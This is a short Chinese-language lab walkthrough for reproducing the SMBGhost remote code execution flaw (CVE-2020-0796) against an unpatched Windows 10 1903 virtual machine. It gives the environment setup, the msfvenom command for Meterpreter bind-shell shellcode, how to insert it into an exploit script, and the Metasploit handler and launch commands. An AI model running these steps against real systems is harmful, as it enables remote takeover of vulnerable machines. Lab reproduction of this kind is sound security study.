CVE-2020-0796(SMBGhost) RCE 复现

基本环境#

攻击机:Kali Linux最新版,192.168.85.131

Python版本:3.6!! 十分重要,Kali自带的3.9会蓝屏

被攻击机:Win10 v1903 (OS内部版本18362.356),192.168.85.145

1
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

Kali配置#

安装Python3.6

1
2
3
4
5
wget -c https://www.python.org/ftp/python/3.6.0/Python-3.6.0.tgz
tar -xvf Python-3.6.0.tgz
cd Python-3.6.0
sudo ./configure
sudo make install

安装后使用python3.6pip3.6执行脚本和安装包

Windows配置#

启动SMB服务

控制面板-> 程序 -> 启动或关闭Windows功能 -> SMB 1.0/CIFS 文件共享支持 -> 重启计算机

关闭防火墙

控制面板-> 系统和安全 -> Windows Defender 防火墙 -> 启动或关闭 Windows Defender防火墙 ->关闭专用网络和共用网络的防火墙

攻击流程#

1
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python -o shellcode.py
  • 修改exploit.py,在USER_PAYLOAD构造的最后加入
1
2
from shellcode import buf
USER_PAYLOAD = buf
  • msf监听端口
1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.85.145
run
  • 脚本攻击
1
python3.6 exploit.py -ip 192.168.85.145

评论